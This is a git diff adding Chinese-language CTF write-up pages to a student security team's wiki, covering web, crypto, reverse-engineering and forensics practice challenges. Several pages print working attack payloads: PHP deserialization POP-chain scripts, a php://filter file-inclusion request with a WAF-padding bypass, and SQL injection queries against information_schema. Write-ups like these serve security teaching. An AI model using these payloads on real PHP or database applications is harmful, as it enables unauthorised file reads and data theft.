diff --git a/ctfnotes/problem-2074-wp/index.html b/ctfnotes/problem-2074-wp/index.html
new file mode 100755
index 0000000..0e5fede
--- /dev/null
+++ b/ctfnotes/problem-2074-wp/index.html
@@ -0,0 +1,1268 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NSSCTF 2022 Spring Recruit]ezgame - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NSSCTF 2022 Spring Recruit]ezgame
+F12分析即拿flag在./js/preload.js里
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2076-wp/index.html b/ctfnotes/problem-2076-wp/index.html
new file mode 100755
index 0000000..0910326
--- /dev/null
+++ b/ctfnotes/problem-2076-wp/index.html
@@ -0,0 +1,1275 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NSSCTF 2022 Spring Recruit]babyphp - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NSSCTF 2022 Spring Recruit]babyphp
+
+第一层非空数组绕过
+post a[]=[1]
+非空空数组MD5
+post b1[]=[1]&b2[]=[2]
+MD5 绕过
+post c1=s878926199a&c2=s155964671a
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2099-wp/index.html b/ctfnotes/problem-2099-wp/index.html
new file mode 100755
index 0000000..2d9d02c
--- /dev/null
+++ b/ctfnotes/problem-2099-wp/index.html
@@ -0,0 +1,1349 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]popchains - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]popchains
+
+审计源码
+构建pop链
+
+Try_Work_Hard.__invoke()
+ =>Make_a_change.__get
+ => Road_is_Long.__toString()
+ => Road_is_Long.__wakeup()
+
+
+编写exp
+~~有坏b误导我我不说是谁~~
+
+<?php
+
+//echo 'Happy New Year~ MAKE A WISH<br>';
+
+/***************************pop your 2022*****************************/
+
+class Road_is_Long
+{
+ public $page;
+ public $string;
+ public function __construct($file = 'index.php')
+ {
+ $this->page = $file;
+ }
+ public function __toString()
+ {
+ return $this->string->page;
+ }
+
+ public function __wakeup()
+ {
+ if (preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
+ echo "You can Not Enter 2022";
+ $this->page = "index.php";
+ }
+ }
+}
+
+class Try_Work_Hard
+{
+ protected $var;
+ public function __construct(){
+ $this->var = "/flag";
+ }
+ public function append($value)
+ {
+ include($value);
+ }
+ public function __invoke()
+ {
+ $this->append($this->var);
+ }
+}
+
+class Make_a_Change
+{
+ public $effort;
+ public function __construct()
+ {
+ $this->effort = array();
+ }
+
+ public function __get($key)
+ {
+ $function = $this->effort;
+ return $function();
+ }
+}
+
+$a = new Try_Work_Hard;
+$b = new Make_a_Change;
+$c = new Road_is_Long;
+$d = new Road_is_Long;
+
+$b->effort = $a;
+$c->string = $b;
+$d->page = $c;
+echo "?wish=" . urlencode(serialize($d));
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-227-wp/index.html b/ctfnotes/problem-227-wp/index.html
new file mode 100755
index 0000000..08307da
--- /dev/null
+++ b/ctfnotes/problem-227-wp/index.html
@@ -0,0 +1,1291 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [羊城杯 2021]Bigrsa - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[羊城杯 2021]Bigrsa
+
+共享素数
+$n_1 n_2$有一素数公因数$p$
+$n_1=pq_1 n_2=pq_2$
+$d_1e\equiv 1\space mod\space\varphi(n_1)$
+$d_2e\equiv 1\space mod\space\varphi(n_2)$
+$\therefore 只需要逆元求出\frac{1}{e}\space mod\space \varphi(n_1)和\frac{1}{e}\space mod\space \varphi(n_2)就可以得到d_1和d_2$
+exp
+
+from gmpy2 import *
+from Crypto.Util.number import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+p = gmpy2.gcd(n1, n2)
+q1, q2 = n1//p, n2//p
+phi_n1, phi_n2 = (p-1)*(q1-1), (p-1)*(q2-1)
+d1, d2 = inverse(e, phi_n1), inverse(e, phi_n2)
+
+m = pow(pow(c, d2, n2), d1, n1)
+print(long_to_bytes(m).decode())
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2422-wp/index.html b/ctfnotes/problem-2422-wp/index.html
new file mode 100755
index 0000000..f531631
--- /dev/null
+++ b/ctfnotes/problem-2422-wp/index.html
@@ -0,0 +1,1306 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [鹏城杯 2022]简单包含 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[鹏城杯 2022]简单包含
+
+审计源码发现其会include'flag'的文件进来
+尝试post flag
+
+exp-fake
+flag = flag.php
+
+获得nssctf waf!
+尝试获取flag.php
+flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
+
+仍然获得获得nssctf waf!
+尝试获取index.php
+flag = php://filter/read=convert.base64-encode/resource=/var/www/html/index.php
+
+解码得
+<?php
+
+$path = $_POST["flag"];
+
+if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {
+ echo 'nssctf waf!';
+} else {
+ @include($path);
+} ?>
+
+<code>
+<span style="color: #000000">
+<span style="color: #0000BB"><?php <br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag in /var/www/html/flag.php;</span>
+</span>
+</code><br />
+
+
+得知可以通过post超长的request来绕过
+所以
+exp
+a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
+
+解码即获得flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2602-wp/index.html b/ctfnotes/problem-2602-wp/index.html
new file mode 100755
index 0000000..433f152
--- /dev/null
+++ b/ctfnotes/problem-2602-wp/index.html
@@ -0,0 +1,1276 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [HUBUCTF 2022 新生赛]checkin - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[HUBUCTF 2022 新生赛]checkin
+
+审计源码 发现使用 ==
+写exp
+
+<?php
+$data_unserialize = ["username"=>true,"password"=>true];
+echo "?info="urlencode(serialize(($data_unserialize)));
+
+传入即得
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-39-wp/index.html b/ctfnotes/problem-39-wp/index.html
new file mode 100755
index 0000000..32f42e0
--- /dev/null
+++ b/ctfnotes/problem-39-wp/index.html
@@ -0,0 +1,1282 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPU 2019]神奇的二维码 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPU 2019]神奇的二维码
+
+binwalk 分析
+发现里面有4个压缩包
+binwalk -b 解开
+得到flag.doc
,flag.jpg
,encode.txt
,good.rar
+4个主要文件
+对flag.doc内部内容解码
+得到
+comEON_YOuAreSOSoS0great
+这个就是good.rar的解压密码
+解开good.rar得到good.mp3
+听一下为摩斯电码
+Audacity 可视化
+在线解码下得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-403-wp/index.html b/ctfnotes/problem-403-wp/index.html
new file mode 100755
index 0000000..748d92a
--- /dev/null
+++ b/ctfnotes/problem-403-wp/index.html
@@ -0,0 +1,1286 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]简简单单的逻辑 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]简简单单的逻辑
+
+审计源码
+因为异或的逆运算就是异或
+所以可以直接编写exp
+编写exp
+
+def decode(cipher):
+ flag = ''
+ for i in range(len(list)):
+ key = (list[i]>>4)+((list[i] & 0xf)<<4)
+ now = cipher[2*i:2*i+2]
+ print(now)
+ now = int(now,16)
+ print(now)
+ now^=key
+ flag+=chr(now)
+ print(flag)
+decode(result)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-404-wp/index.html b/ctfnotes/problem-404-wp/index.html
new file mode 100755
index 0000000..31d3f5c
--- /dev/null
+++ b/ctfnotes/problem-404-wp/index.html
@@ -0,0 +1,1293 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]简简单单的解密 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]简简单单的解密
+没什么好写的照着代码逆回去就行了
+import base64
+import urllib.parse
+key = "HereIsFlagggg"
+s_box = list(range(256))
+j = 0
+for i in range(256):
+ j = (j + s_box[i] + ord(key[i % len(key)])) % 256
+ s_box[i], s_box[j] = s_box[j], s_box[i]
+enc = "%C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA"
+
+enc = urllib.parse.unquote(enc)
+crypt = str(base64.b64encode(bytes(enc, 'utf8')), 'utf-8')
+cipher = base64.b64decode(bytes(crypt, 'utf8')).decode('utf-8')
+res = list(cipher)
+flag = ''
+i = j = 0
+for s in res:
+ i = (i + 1) % 256
+ j = (j + s_box[i]) % 256
+ s_box[i], s_box[j] = s_box[j], s_box[i]
+ t = (s_box[i] + s_box[j]) % 256
+ k = s_box[t]
+ flag += chr(ord(s)^k)
+print(flag)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-413-wp/index.html b/ctfnotes/problem-413-wp/index.html
new file mode 100755
index 0000000..3ec3c6f
--- /dev/null
+++ b/ctfnotes/problem-413-wp/index.html
@@ -0,0 +1,1344 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]crypto2 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]crypto2
+共模攻击
+顺便巩固下rsa
+符号
+c
:密文
+m
:明文
+(d,n)
:私钥
+(e,n)
:公钥
+p
q
为生成n
的两个大质数
+有$n=pq$
+由欧拉函数的定义得$\varphi (n)=\varphi (p)\varphi (q)=(p-1)(q-1)$
+任意选一正整数e 使得$gcd(e,\varphi (n))=1$
+$d$ 满足 $(de)\space mod \space \varphi (n)=1$ 即 $(de) = k\varphi (n)+1,k \ge 1$
+将$m$加密为$c$
+$c=m^e\space mod \space n$
+将$c$解密为$m$
+$m=c^d\space mod \space n$
+证明
+$$
+\because c=m^e\space mod \space n\
+\therefore c \equiv m^e\space mod \space n\
+\therefore c^d \equiv m^{ed}\space mod \space n\
+\therefore c^d \equiv m^{k\varphi (n)+1}\space mod \space n\
+\space\
+当gcd(m,n)=1时有:\
+c^d \equiv (m^{\varphi (n)})^{k}\times m\space mod \space n\
+c^d \equiv 1^k\times m\space mod \space n\
+c^d \equiv m\space mod \space n\
+\space\
+当gcd(m,n)\ne1时有:\
+此时必定有gcd(q,m)=1或gcd(p,m)=1\
+设m=m^{'}p \space 此时 gcd(q,m)=1\
+c^d \equiv m^{k\varphi (p)\varphi (q)}\times m\space mod\space n\
+c^d \equiv (m^{\varphi(q)\varphi(p)})^{k}\times m\space mod \space n\
+又\because m^{\varphi(q)}\equiv 1 \space mod \space q\
+\therefore m^{k\varphi(q)\varphi(p)}\equiv 1^{k\varphi(p)} \space mod \space q\
+\therefore m^{k\varphi(q)\varphi(p)}=(k_2q+1)
+代入得\
+c^d \equiv (k_2q+1)\times m\space mod \space n\
+c^d \equiv (k_2m^{'}pq+m)\times m\space mod \space n\
+c^d \equiv m\space mod \space n\
+证毕.
+$$
+附:
+1. 欧拉定理
+$$
+a^{\varphi(n)}\equiv 1\space mod\space n,当gcd(n,a)=1且n,a\ge0
+$$
+且当n为质数时为费马小定理
+$$
+a^{n-1}\equiv 1(mod\space n)
+$$
+共模攻击原理
+$e_1,e_2,n,c_1,c_2$ 已知
+且
+$c_1=m^{e_1}\space mod
+ \space n$
+ $c_2=m^{e_2}\space mod
+ \space n$
+当$gcd(e_1,e_2)=1$
+有$m=(c_1^{s_1}\times c_2^{s_2})\space mod \space n$
+其中$e_1s_1+e_2s_2=1$
+证明
+$$
+m\
+=m^1\
+=m^{e_1s_1+e_2s_2}\
+=(m^{e_1})^{s_1}(m^{e_2})^{s_2}\
+\equiv c_1^{s_1}c_2^{s_2}\space mod\space n\
+证毕.
+$$
+所以解共模题时只要用exgcd求出
+$s_1,s_2$
+附:
+1. 贝祖定理
+$$
+ax+by=gcd(a,b)
+$$
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-440-wp/index.html b/ctfnotes/problem-440-wp/index.html
new file mode 100755
index 0000000..37c958a
--- /dev/null
+++ b/ctfnotes/problem-440-wp/index.html
@@ -0,0 +1,1334 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]pop - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]pop
+~~你这个取名真的可以的~~
+1. 审计源码
+2. 寻找pop链
+知识点:
+变量后面加括号是动态调用函数
+$abc('asd')
+等价于
+asd(abc);
+
+unserialize -> w22m.__construct -> w22m.__destruct ->
+w33m.__toString -> w44m.__construct & w44m.Getflag
+
+编写exp
+
+<?php
+class w44m
+{
+ private $admin = 'aaa';
+ protected $passwd = '123456';
+ public function __construct()
+ {
+ $this->admin = 'w44m';
+ $this->passwd = '08067';
+ }
+ public function Getflag()
+ {
+ if ($this->admin === 'w44m' && $this->passwd === '08067') {
+ include('flag.php');
+ echo $flag;
+ } else {
+ echo $this->admin;
+ echo $this->passwd;
+ echo 'nono';
+ }
+ }
+}
+class w33m
+{
+ public $w00m;
+ public $w22m;
+ public function __toString()
+ {
+ $this->w00m->{$this->w22m}();
+ return 0;
+ }
+ public function __construct(){
+ $this->w22m = "Getflag";
+ $this->w00m = new w44m;
+ }
+}
+class w22m
+{
+ public $w00m;
+ public function __destruct()
+ {
+ echo $this->w00m;
+ }
+ public function __construct()
+ {
+ $this->w00m = new w33m;
+ }
+}
+
+$a = new w22m;
+echo "?w00m=".urlencode(serialize($a))
+ ?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-442-wp/index.html b/ctfnotes/problem-442-wp/index.html
new file mode 100755
index 0000000..dcf5c76
--- /dev/null
+++ b/ctfnotes/problem-442-wp/index.html
@@ -0,0 +1,1283 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]sql - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]sql
+
+传入wllm参数
+hint:Want Me? Cross the Waf
+沙箱绕过
+主要限制为
+ban 空格 等号 限制输出大小20字
+exp编写
+exp1(查询数据表)
+?wllm=-1'union/**/select/**/1,group_concat(TABLE_NAME),3/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA/**/like/**/'test_db'%23
+可以看到test_db内的表
+有LTLT_flag和user
+exp2(查询表内字段)
+?wllm=-1'union/**/select/**/1,group_concat(COLUMN_NAME),3/**/from/**/information_schema.columns/**/where/**/TABLE_NAME/**/like/**/'LTLT_flag'%23
+exp3(输出flag)
+?wllm=-1'union/**/select/**/1,mid(group_concat(flag),1,21),mid(group_concat(flag),21,40)/**/from/**/test_db.LTLT_flag%23
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-444-wp/index.html b/ctfnotes/problem-444-wp/index.html
new file mode 100755
index 0000000..5fe564c
--- /dev/null
+++ b/ctfnotes/problem-444-wp/index.html
@@ -0,0 +1,1310 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]re1 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]re1
+
+IDA反编译
+
+发现只是做简单字符替换
+写exp
+exp
+
+#include <iostream>
+using namespace std;
+string str2 = "{34sy_r3v3rs3}";
+void dfs(int now)
+{
+ if (now == str2.length() - 1)
+ {
+ cout << "NSSCTF" << str2 << endl;
+ return;
+ }
+ if (str2[now] == 52)
+ {
+ str2[now] = 97;
+ dfs(now + 1);
+ str2[now] = 52;
+ dfs(now + 1);
+ }
+ else if (str2[now] == 51)
+ {
+ str2[now] = 101;
+ dfs(now + 1);
+ str2[now] = 51;
+ dfs(now + 1);
+ }
+ else
+ {
+ dfs(now + 1);
+ }
+}
+int main()
+{
+ freopen("ans.txt", "w", stdout);
+ dfs(0);
+}
+
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-463-wp/index.html b/ctfnotes/problem-463-wp/index.html
new file mode 100755
index 0000000..3e10f0c
--- /dev/null
+++ b/ctfnotes/problem-463-wp/index.html
@@ -0,0 +1,1276 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [鹤城杯 2021]EasyP - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[鹤城杯 2021]EasyP
+
+审阅代码
+知识点:
+php会将
+' ','.','[','chr(128)-chr(159)'
当做'_'
+basename函数遇到非ascii会舍弃
+
+即可构建exp
+/index.php/utils.php/%ff?show%20source
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-47-wp/index.html b/ctfnotes/problem-47-wp/index.html
new file mode 100755
index 0000000..4638bb9
--- /dev/null
+++ b/ctfnotes/problem-47-wp/index.html
@@ -0,0 +1,1275 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPU 2020]套娃 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPU 2020]套娃
+~~说好的套娃呢~~
+1. 下载得到xlsx
+解压即得RC4data.txt
和swpu.xlsx
+2. 解压swpu.xlsx
+得esayrc4.xlsx
和RC4key.zip
+3. 发现RC4key.zip
需要密码
+去esayrc4.xlsx
寻找线索
+发现esayrc4.xlsx
无法解压HxD
打开就找到了password
+拿password解压RC4key.zip
+然后在线解密下RC4data.txt
就得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/index.html b/index.html
index bf8c4db..54772a6 100755
--- a/index.html
+++ b/index.html
@@ -227,6 +227,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -690,6 +706,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/member/index.html b/member/index.html
index 95795b8..b64d1d7 100755
--- a/member/index.html
+++ b/member/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -714,6 +730,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html b/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html
index f57ac76..741aeea 100755
--- a/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html
+++ b/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html b/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html
index 295a3b9..e7b0ae5 100755
--- a/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html
+++ b/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html
@@ -224,6 +224,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -641,6 +657,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+
diff --git a/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html b/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html
index 8c8235f..4e850a0 100755
--- a/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html
